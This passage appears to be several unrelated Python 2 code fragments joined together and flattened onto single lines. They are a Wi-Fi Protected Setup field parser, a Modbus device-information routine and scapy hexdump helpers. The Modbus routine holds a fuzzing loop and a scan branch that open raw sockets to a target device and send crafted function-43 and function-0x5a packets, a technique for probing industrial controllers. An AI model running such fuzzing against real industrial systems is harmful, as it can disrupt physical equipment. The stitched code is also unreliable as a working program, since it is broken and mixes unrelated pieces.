2: subCategory = "PVR" elif subCategory == 3: subCategory = "MCX" else: subCategory = "<unkwon>" elif category == 9: category = "Gaming Devices" if subCategory == 1: subCategory = "Xbox" elif subCategory == 2: subCategory = "Xbox360" elif subCategory == 3: subCategory = "Playstation" else: subCategory = "<unkwon>" elif category == 10: category = "Telephone" if subCategory == 1: subCategory = "Windows Mobile" else: subCategory = "<unkwon>" else: category = "<unkwon>" subCategory = "<unkwon>" tagData = "%s - %s" % (category, subCategory) if tagType == "Version": tagData = struct.unpack("B", tagData)[0] major = tagData >> 4 minor = tagData & 0x0F tagData = "%d.%d" % (major, minor) if tagType == "Config Methods": methods = { 0x0001: "USB", 0x0002: "Ethernet", 0x0004: "Label", 0x0008: "Display", 0x0010: "External NFC Token", 0x0020: "Integrated NFC Token", 0x0040: "NFC Interface", 0x0080: "PushButton", 0x0100: "Keypad" } result = [] tagData = struct.unpack("!H", tagData)[0] for key, value in methods.items(): if key & tagData: result.append(value) tagData = ", ".join(result) if tagType: ret[tagType] = tagData return ret except: print('Error parsing vendor specific fields!') hexdump(IEs) return None
def DeviceInfo(self): if func_fuzzing: #readDeviceId = bytearray([0x01, 0x02, 0x03, 0x04]) #objectId = bytearray([0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06]) for rd in range(4,4+1): for ob in range(0x80,0xff+1): # res = self.Request(0x2b, bytes(bytearray(0x0e, str(rd), str(o)))) # if res and len(res)>5: # objectCount = ord(res[5]) # data = res[6:] # info = '' # for i in range(0, objectCount): # info += data[2:2+ord(data[1])] # info += ' ' # data = data[2+ord(data[1]):] # return info # else: # raise ModbusProtocolError('Packet format (reply for device info) wrong', res) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.ip, self.port)) senddata = bytes(bytearray([0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x2b,0x0e,rd,ob])) print "+++++++++++++++++send" print hexdump(senddata) sock.send(senddata) recv = sock.recv(1024) print "+++++++++++++++++recv" print hexdump(recv) time.sleep(1) if not recv: raise ModbusError(0) resp = ModbusPacket().unpack(recv) if resp.unitId != self.uid: print 'recv.unitId != self.uid' if resp.functionId != 43: print 'recv.functionId != 43' if resp.functionId == 171: print 'Read Device Identification Error, error code:%r' % resp.data[0] exit() elif di_scan: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.ip, self.port)) senddata = bytes(bytearray([0x00, 0x0f, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x5a, 0x00, 0x20, 0x00, 0x14, 0x00, 0x64, 0x00, 0x00, 0x00, 0xf6, 0x00])) print "------------send" print hexdump(senddata) sock.send(senddata) recv = sock.recv(1024) print "------------recv" print hexdump(recv) exit() else: res = self.Request(0x2b, '\x0e\x01\00') if res and len(res)>5: objectsCount = ord(res[5]) data = res[6:] info = '' for i in range(0, objectsCount): info += data[2:2+ord(data[1])] info += ' ' data = data[2+ord(data[1]):] return info else: raise ModbusProtocolError('Packet format (reply for device info) wrong', res)
def ppp(headline, packet): """ Return string containing the output of scapy packet.show() call. """ return '%s\n%s\n\n%s\n' % (headline, hexdump(packet, dump=True), packet.show(dump=True))
def rawhexdump(self): """Prints an hexadecimal dump of each packet in the list""" for p in self: hexdump(self._elt2pkt(p))